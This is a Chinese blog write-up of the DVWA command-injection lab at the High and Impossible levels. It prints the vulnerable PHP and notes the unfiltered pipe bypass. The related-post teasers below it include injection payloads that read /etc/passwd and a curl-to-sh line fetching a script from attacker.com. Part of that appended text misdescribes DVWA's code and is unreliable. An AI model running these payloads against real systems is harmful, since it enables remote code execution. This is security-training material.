【DVWA】13. Command Injection命令注入(High+Impossible)

最新推荐文章于 2025-03-16 23:16:07 发布
最新推荐文章于 2025-03-16 23:16:07 发布
阅读量1.2k 收藏 19
点赞数 24
CC 4.0 BY-SA版权
分类专栏: # DVWA 文章标签: 代码审计 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43965597/article/details/135090239
文章详细分析了两个PHP脚本,一个是移除特殊字符并执行ping命令,另一个是强化输入验证,包括去除空白、字符过滤、IP验证和CSRF防护。这些措施提高了代码的安全性,确保命令执行的可靠性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

1. High

1)源码分析

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = trim($_REQUEST[ 'ip' ]);

    // Set blacklist
    $substitutions = array(
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

从用户输入中移除特殊字符,例如 ‘&’、‘;’、‘|’ 、‘-’、‘$’ 、 ‘(’ 、 ‘)’ 、 和 ‘||’
不难发现特殊符号没有对 ‘|’(无空格) 进行替换,在输入框输入 ip地址|系统命令 并执行,便可轻松获取想获取的系统信息

2)实操

||前后加上空格即可
在这里插入图片描述

2. Impossible

1)源码分析

<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $target = $_REQUEST[ 'ip' ];
    $target = stripslashes( $target );

    // Split the IP into 4 octects
    $octet = explode( ".", $target );

    // Check IF each octet is an integer
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
        // If all 4 octets are int's put the IP back together.
        $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];

        // Determine OS and execute the ping command.
        if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
            // Windows
            $cmd = shell_exec( 'ping  ' . $target );
        }
        else {
            // *nix
            $cmd = shell_exec( 'ping  -c 4 ' . $target );
        }

        // Feedback for the end user
        echo "<pre>{$cmd}</pre>";
    }
    else {
        // Ops. Let the user name theres a mistake
        echo '<pre>ERROR: You have entered an invalid IP.</pre>';
    }
}

// Generate Anti-CSRF token
generateSessionToken();

?>

改进的地方包括:

输入的去除空白和字符过滤: 使用 trim() 函数删除输入中的前导和尾随空白字符,以避免用户输入的空白字符引起的问题。然后,使用一个黑名单数组 $substitutions 来定义需要替换为空字符串的特殊字符。使用 str_replace() 函数根据黑名单数组中的键值对进行字符替换,以过滤掉潜在的危险字符。

命令执行前的字符过滤: 在替换和过滤用户输入之后,再将过滤后的 $target 变量用于构造命令。这样可以确保命令中不包含潜在的恶意字符或命令注入的漏洞。

  1. 检查用户 token 和 session token 是否匹配。
    ……
    checkToken( $_REQUEST[ ‘user_token’ ], $_SESSION[ ‘session_token’ ], ‘index.php’ );
    ……
    checkdnsrr() — 给指定的主机(域名)或者IP地址做DNS通信检查,可以防止请求伪造。

  2. 去除 IP 地址中的反斜杠。
    ……
    $target = stripslashes( $target );
    ……
    stripslashes() — 反引用一个引用字符串。将反斜杠 ‘’ 转换为正斜杠 ‘/’ 。

  3. 将 IP 地址拆分成四个部分。
    ……
    $octet = explode( “.”, $target );
    ……
    explode() — 使用一个字符串分割另一个字符串。这里用 ‘.’ 将 IP 地址进行了分割。

  4. 检查 IP 地址分割后的各部分是否为单纯的数字,如果是,则将拆分的 IP 地址重新拼接,进而继续进行后续操作。
    ……
    if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
    // If all 4 octets are int’s put the IP back together.
    $target = $octet[0] . ‘.’ . $octet[1] . ‘.’ . $octet[2] . ‘.’ . $octet[3];
    ……
    is_numeric() — 检测变量是否为数字或数字字符串。

不难看出该方法对输入的 IP 地址做了合法性验证,只有输入符合 IPv4 格式的内容才能被正常执行,排除了一切可以注入其他命令的可能,安全性方面得到大幅提升。

4.Command Injection——High级别测试——小白笔记——DVWA
qwsn
11-14 1535
0x01:High测试 1.上源码: Command Injection Source <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = trim($_REQUEST[ 'ip' ]); // Set blacklist $substitutions = array( ...
DVWA命令执行(Command Injection)high难度代码解释】
无聊人的博客
06-09 541
dvwa命令执行high难度代码
DVWA-Command Injection(High)
七月_的博客
10-22 426
文章目录Command Injection(High)代码分析漏洞利用 Command Injection(High) 代码分析 <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = trim($_REQUEST[ 'ip' ]); // Set blacklist $substitutions = a...
代码审计—DWVA—Command InjectionL—impossible
王嘟嘟的博客
11-15 352
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 直接上代码吧。 把需要包含的文件全部都给写死了,这样就没有办法来进行文件包含了,比想象中的还简单,但是效果真的好。 ...
DVWA 靶场 impossible 级别命令注入代码审计
QYbkx974的博客
11-21 365
之前审计了 high 级别命令注入,这次来尝试 impossible 级别代码审计,自己的理解,有错误多多担待。
DVWA靶场-Command Injection命令注入
mlws1900的博客
03-13 1505
比如PHP中的eval()函数,可以将函数中的参数当做PHP代码来执行,如果这些函数的参数控制不严格,可能会被利用,造成任意代码执行。命令注入Command Injection)漏洞也称为远程命令/代码执行漏洞(RCE,Remote Command/Code Exec),指应用程序的某些功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数能被用户控制,就可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,属于高危漏洞之一。我们可以利用其他管道符进行绕过,例如|,||,&符号。
DVWA系列之Command Injection(命令注入)源码分析及漏洞利用
7Riven's blog
11-26 2294
Command Injection Command Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。 PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。 命令执行产生原因 命令执行漏洞是指应用有时需要调用一些执行系统命令的函数如: system()...
DVWA系列---Command Injection命令注入
野原新之助
01-23 713
文章目录一、前言1、命令注入2、命令拼接符二、Low级别(查看源代码)三、Medium级别(查看源代码)四、High级别(查看源代码)五、Impossible级别(查看源代码)六、防御方法 一、前言 1、命令注入 命令注入漏洞主要是指服务器对来自网络的语句,没有进行严格的过滤,导致在执行合法命令的同时,也执行了一些恶意构造的非法命令,使得服务器被破坏。 通常命令注入是指os命令注入,即通过Shel...
DVWA 靶场-Command InjectionHighImpossible难度的代码、函数翻译
weixin_58371339的博客
06-10 293
这里面出现了很多的函数,对于初学者来说很不友好,特别是组合在一起更加不友好,所以我们可以将函数单独罗列出来,并单独举个例子,这样感觉会更容易记忆跟理解。这边可以看到在写入代码时我们在字符串首尾处添加的空白字符被去除了,但是字符串中间添加的空白字符不受影响。以上就是我对这些代码的个人看法与理解,新手小白一枚,有什么不对的地方希望大佬可以指正一下,望多多包涵!通过上下输出的效果对比,下面定义的变量内容如果跟上面数组键名相同的话,就会被替换成空白字符。array_keys — 返回数组中部分的或所有的键名。
DVWA命令注入Command Injection
弱弱的小雨鸟
01-21 1万+
命令注入Command Injection),是指在某些需要输入数据的位置,还构造了恶意的代码破坏了原先的语句结构。而系统缺少有效的过滤,最终达到破坏数据、信息泄露甚至掌控电脑的目的。许多内容管理系统CMS存在命令注入漏洞。   解决乱码问题 在文本框中输入”ip address”后结果显示为乱码,如下图所示。 解决此问题的方法:在DVWA-master\dvwa\includes
DVWA-impossible代码审计
qq_45953122的博客
10-19 872
在暴力破解的impossible级别中,源代码中使用了Token校验,有效的放防止了CSRF攻击,并且进行了预编译查询数据库,防止了SQL注入漏洞。还添加了用户登录失败次数校验,账户锁定规则校验。在命令注入impossible级别中,源代码中使用了Token校验,有效的放防止了CSRF攻击。在代码逻辑上对用户输入的ip数据进行过滤,也就是对输入的ip进行按位查看是否规范。从而防止了命令注入漏洞的产生。
DVWA 靶场之 Command Injection命令执行)middle&high
Welcome To Myon'Blog !
02-27 1105
除了靶场,其实命令执行漏洞在我们的现实中也是有很多的,建议各位多去打打实战,当然是在符合法律的前提下。这个原理其实还是一样的,只是说它引入了更大范围的黑名单,移除了更多可能用于构造恶意命令的字符。设置了黑名单数组,其中包含了一些常见的用于命令注入的特殊字符,如 && 和;使用 str_replace() 函数将黑名单数组中的特殊字符替换为空字符串。以上就是关于 dvwa 靶场命令执行漏洞的讲解。还可以使用两个或,让前面为假,执行后面的。因此我们使用无空格的或即可绕过。一个或是直接执行后面的命令
DVWA 命令注入从 Low 到 Impossible 教程及源码分析
ericalezl的博客
03-16 549
Impossible 级别DVWA 通过严格的输入验证和白名单机制彻底修复了命令注入漏洞。使用更严格的输入验证,例如只允许 IP 地址格式的输入。使用白名单机制,只允许特定的字符或命令。函数对用户输入进行转义。没有对用户输入做任何限制。**源码分析:**他给。
DVWA代码审计command injection high级别 php语言代码详解
agrilly的博客
06-09 179
DVWA代码审计command injection high级别 php语言代码详解
2、DVWA——命令注入
qq_55202378的博客
08-29 1029
DVWA 命令·注入
DVWA命令注入漏洞
weixin_56306210的博客
02-06 2552
DVWA命令注入漏洞
DVWA系列()----Command Injection (命令注入)
热门推荐
fendo
02-10 2万+
一、攻击模块2:Command Injection命令注入)       命令注入攻击的常见模式为:仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致信息泄露或者正常数据的破坏。        PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeC
dvwa——Command Injection初级、中级和高级python脚本解法(二)和(三)
记录并分享学习安全的知识点..
01-23 508
输入127.0.0.1命令,查看DVWAcommand execute页面的源代码,如下图所示: 通过查询得知pre是唯一的,因此需要将返回页面中的pre标签提取出来,本篇主要讲解在解法一的基础上使用re模块正则网页内容,爬取网页数据,达到通过目的。 python爬虫——request模块(一)_xiaofengdada的博客-CSDN博客_python request python——正则表达式(一)_xiaofengdada的博客-CSDN博客 python——re模块9个常量举例详细讲.
DVWA TOP 10 整理集——Brute_Force,Command Injection,CSRF,File Inclusion,File Uplod(更新中....
小羊的博客
09-30 1449
.Brute_Force Brute_Force HighDVWA调至high级别,发现用之前的暴力破解就不好使了,因为其使用了随机token机制来防止CSRF,从而在一定程度上防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1. 将登录请求进行拦截,发现增加了user_token参数,所以爆破要选择三个参数来进行,先将请求发送到intruder(测试器)。 2.攻击模式选择Pitchfork(音叉),清除所有变量,并分别添加username、&amp.
dvwa靶场Command Injectionmin命令注入
最新发布
04-02
<think>嗯,用户想了解DVWA靶场中的Command Injection漏洞测试和利用方法,需要详细步骤和示例。首先,我得回忆一下DVWA的基本设置,尤其是命令注入的模块。用户可能已经知道DVWA是什么,但可能需要先登录到Low安全级别开始测试。 首先,命令注入通常发生在用户输入被拼接到系统命令中执行的情况下。在DVWACommand Injection模块,用户输入一个IP地址,然后系统执行ping命令。这时候,如果输入没有经过严格的过滤,攻击者可以注入额外的命令。 比如,在Low安全级别下,后端代码可能直接拼接用户输入的参数到ping命令中,而没有做任何过滤。这时候用户输入类似`127.0.0.1; ls`,分号后面的命令就会被执行。这时候需要给出具体的示例,比如如何利用不同的符号如`&&`、`|`或者`&`来注入命令。 接下来,不同安全级别的防护措施不同。比如Medium级别可能过滤了一些符号,但可能没有完全覆盖,这时候需要测试哪些符号被转义或过滤了。比如,可能过滤了`;`和`&&`,但`|`可能仍然可用,或者需要尝试其他绕过方法,比如用`%0a`(换行符)来分隔命令High级别的防护可能更严格,可能只允许特定的输入格式,比如限制输入为IP地址格式。这时候可能需要利用IP地址的格式特性,比如使用`127.0.0.1 || ls`,如果代码检查IP格式是否合法,但后面的命令仍然会被执行的话。或者,使用反引号执行命令,如`$(ls)`。 Impossible级别可能使用了白名单或其他彻底防护的方法,这时候基本无法注入,需要说明其防护机制,比如使用escapeshellarg函数处理参数。 在漏洞利用示例中,要分级别展示不同的注入方式,并说明如何通过Burp Suite这样的工具拦截请求,修改参数,或者直接在输入框中输入注入命令。还要注意不同操作系统下的命令差异,比如Windows和Linux的符号可能不同,但DVWA通常运行在Linux环境下。 另外,生成的相关问题需要考虑用户可能进一步想知道如何防御命令注入,或者DVWA其他漏洞模块的测试方法,比如SQL注入或XSS。还要注意提醒用户只在合法授权的环境下进行测试,避免法律问题。 现在需要确保回答结构清晰,步骤正确,示例准确,并且引用格式正确。要检查是否有遗漏的安全级别或常见绕过方法,比如使用反斜杠转义或者编码绕过过滤。同时,要确保给出的代码示例正确,比如PHP中可能存在漏洞的代码部分,以及防护措施如参数化执行或输入验证。</think># DVWA Command Injection漏洞测试与利用方法 ## 一、漏洞原理 命令注入漏洞产生于未正确过滤用户输入的情况下,攻击者通过拼接系统命令实现任意命令执行。DVWACommand Injection模块模拟了`ping`功能,其基础命令为: $$ ping -c 4 {user_input} $$ 当用户输入包含`;`、`&&`、`|`等命令分隔符时,可注入额外命令[^1]。 ## 二、安全测试步骤(分安全等级) ### 1. Low安全级别 **测试方法**: ```http POST /vulnerabilities/exec/ HTTP/1.1 Host: localhost ... ip=127.0.0.1;whoami&Submit=Submit ``` **注入示例**: - `127.0.0.1; ls /` 列出根目录 - `127.0.0.1 && cat /etc/passwd` 查看系统账户 ### 2. Medium安全级别 **过滤机制**: ```php $target = str_replace(';', '', $target); // 移除分号 ``` **绕过方法**: ```http ip=127.0.0.1%0aid && ping -c 4 127.0.0.1 ``` 使用换行符`%0a`或未过滤的`&`符号 ### 3. High安全级别 **防护代码**: ```php if( preg_match( '/^[0-9.]+$/i', $target ) ) // 限制数字和点号 ``` **绕过示例**: ```bash 127.0.0.1 || ls -al ``` 利用逻辑运算符绕过正则检测 ### 4. Impossible级别 **防护措施**: ```php $target = escapeshellarg($target); // 参数化处理 $cmd = shell_exec('ping -c 4 '.$target); ``` 此时无法进行命令注入 ## 三、漏洞利用演示 **Burp Suite拦截修改**: ```http POST /vulnerabilities/exec/ HTTP/1.1 ... ip=127.0.0.1;curl+http://attacker.com/shell.sh+|+sh ``` 该payload将下载并执行远程脚本 ## 四、防御方案 1. 使用`exec($command, $output)`替代直接命令拼接 2. 实施白名单验证: ```php if (!preg_match('/^[0-9.]+$/', $ip)) { die("Invalid IP format"); } ``` 3. 参数化处理: ```php $clean_ip = escapeshellarg($_POST['ip']); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值